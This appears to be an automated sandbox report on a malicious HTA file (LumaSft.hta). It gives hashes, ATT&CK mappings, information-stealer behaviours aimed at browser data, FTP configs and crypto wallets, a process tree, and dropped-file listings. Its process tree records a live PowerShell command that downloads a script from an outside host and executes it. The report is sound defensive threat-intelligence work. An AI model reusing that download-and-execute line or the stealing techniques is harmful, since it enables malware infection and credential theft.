e93a2475fff6c02d66d92680bf19edfce3a89129e89408e76396ab1ee7ed36aa

General

Target

LumaSft.hta
Size

162KB
MD5

50b4ea549c48d995ddf248188795d2d8
SHA1

bfda7329b7a8519b20617d39da553464a3163d29
SHA256

e93a2475fff6c02d66d92680bf19edfce3a89129e89408e76396ab1ee7ed36aa
SHA512

42d22c0cd19a8dc3d923403a53115d2297355038c3a3d1ba93249b4f2faa3d5f84f594a49a7edcd2fa7d03f0fd0ac394ba12eb997c2f9ab97b3380e62e6fe949
SSDEEP

384:fuhtvGkNrkNrkNrkNrkNrkNrkNrkNrkNrkNrkNUQtWgQlqQQwGt9OYF:fuusssssssssszQ6sQQl9O0

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2280	mshta.exe
6	2280	mshta.exe
10	2280	mshta.exe
14	2072	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	mshta.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2072	powershell.exe
2072	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2072	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 2072	2280	mshta.exe	88
PID 2280 wrote to memory of 2072	2280	mshta.exe	88
PID 2280 wrote to memory of 2072	2280	mshta.exe	88
PID 2072 wrote to memory of 4720	2072	powershell.exe	90
PID 2072 wrote to memory of 4720	2072	powershell.exe	90
PID 2072 wrote to memory of 4720	2072	powershell.exe	90
PID 4720 wrote to memory of 5020	4720	csc.exe	91
PID 4720 wrote to memory of 5020	4720	csc.exe	91
PID 4720 wrote to memory of 5020	4720	csc.exe	91
PID 2072 wrote to memory of 3764	2072	powershell.exe	92
PID 2072 wrote to memory of 3764	2072	powershell.exe	92
PID 2072 wrote to memory of 3764	2072	powershell.exe	92
PID 2072 wrote to memory of 3764	2072	powershell.exe	92

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\LumaSft.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://pg.zu.edu.ly/tt/gfdsgfdsgfdgfsdg.txt | iex
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4xhcf4tx\4xhcf4tx.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EE9.tmp" "c:\Users\Admin\AppData\Local\Temp\4xhcf4tx\CSC34EFF05DE23646F1B0DBA0E5148F5AF1.TMP"
      4⤵
      PID:5020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:3764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

3

T1552

Credentials In Files

3

T1552.001

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

3

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4xhcf4tx\4xhcf4tx.dll

Filesize
3KB

MD5
1efbf015b1c63ce198124cd7c937aacc

SHA1
940cb5165d5e532818930540278d94a36d28fb22

SHA256
30b37464d9f409083d7348d6eae4d702cad540ae8028cbf56eb9d8013b729a9d

SHA512
6e7e94393a64d314086ea4003857717a82562f3ea474c4cc195042e0a22a8d7a09203fcfe76e15f45c7a0c8ed1bf8c7a3edc41dec0d7926e9ec605d83c22f3c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5EE9.tmp

Filesize
1KB

MD5
8b439c4306f8a2aaf2573f61fc1d729f

SHA1
37d26d9a2b4e35159dada37c7bccbd67b7bab3d2

SHA256
2fc0bb5b953fb7792a20b91c563675aa9c973082b61e668a92e83c1b01822ed9

SHA512
8cb0e8a84a2fbb2666b3fb313182fd794f6911828faa974d972b00529257cb2b4883a5d0e6ebb4835167a3e71d67f30b0a0d3d8e5d53fd72edbc4ac359614c56

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgp1jx3r.sbw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4xhcf4tx\4xhcf4tx.0.cs

Filesize
293B

MD5
f74945ba6eef5d976da8a775e22ecbd7

SHA1
920861d0ea17bf9dd114f0d10df56fa278e7abab

SHA256
6e2594cc5c1101adbaa04d1494d122332d372767b11c435ce50ef01aff688617

SHA512
9d1b3bae83b7b69868817b51438243f9343659bd8d3b6e170e1b767dded62bae39d450fee4e4ae444313deaad50a59806f71092ced729b43f0304177b9c39f6f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4xhcf4tx\4xhcf4tx.cmdline

Filesize
369B

MD5
31d3ccc23445522ae821e8cd07c26891

SHA1
be1de1e453b93d315b19c5ac9ea18bde6350fdd8

SHA256
01332308a1298659a013697c4ed47a8a8c2c001924396a5c193b90dc850870ea

SHA512
128c2c943b862474c6744c1db5992253376a68ba6275adcd26433e3c280b34ccf1c08cbf9e2f0bf53644e5a27d897f9a23073d02bfe11a882e4b1268254f930b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4xhcf4tx\CSC34EFF05DE23646F1B0DBA0E5148F5AF1.TMP

Filesize
652B

MD5
c99e21c5cd05f091607c52c904ad5ea8

SHA1
7718052e6aac35264774bd1d27a9e55fab09545e

SHA256
30cd2b472f044b4ce986d153a5a367164afcad6553704ca8391a37713531c187

SHA512
39c9193238e3423e3af0fcb60b73742f395fdfcd7b5569ab330cddb972b70f4f7aee6478ed897060582251a4dcbdfe0acc858e486108121d1514b5ed15cdedbd

Download Submit
memory/2072-29-0x00000000067C0000-0x00000000067DA000-memory.dmp

Filesize
104KB

Download
memory/2072-12-0x0000000005480000-0x00000000054A2000-memory.dmp

Filesize
136KB

Download
memory/2072-14-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/2072-25-0x0000000005E50000-0x00000000061A4000-memory.dmp

Filesize
3.3MB

Download
memory/2072-26-0x00000000062F0000-0x000000000630E000-memory.dmp

Filesize
120KB

Download
memory/2072-27-0x0000000006330000-0x000000000637C000-memory.dmp

Filesize
304KB

Download
memory/2072-4-0x0000000004F70000-0x0000000004FA6000-memory.dmp

Filesize
216KB

Download
memory/2072-28-0x0000000007C00000-0x000000000827A000-memory.dmp

Filesize
6.5MB

Download
memory/2072-30-0x0000000008280000-0x0000000008442000-memory.dmp

Filesize
1.8MB

Download
memory/2072-15-0x0000000005CE0000-0x0000000005D46000-memory.dmp

Filesize
408KB

Download
memory/2072-11-0x00000000056B0000-0x0000000005CD8000-memory.dmp

Filesize
6.2MB

Download
memory/2072-7-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/2072-43-0x00000000068C0000-0x00000000068C8000-memory.dmp

Filesize
32KB

Download
memory/2072-6-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/2072-5-0x000000006FC00000-0x00000000703B0000-memory.dmp

Filesize
7.7MB

Download
memory/2072-45-0x0000000007540000-0x0000000007548000-memory.dmp

Filesize
32KB

Download
memory/2072-49-0x000000006FC00000-0x00000000703B0000-memory.dmp

Filesize
7.7MB

Download
memory/3764-46-0x0000000001030000-0x0000000001083000-memory.dmp

Filesize
332KB

Download
memory/3764-50-0x00000000015B0000-0x00000000015FE000-memory.dmp

Filesize
312KB

Download
memory/3764-52-0x00000000015B0000-0x00000000015FE000-memory.dmp

Filesize
312KB

Download

Analysis

Sharing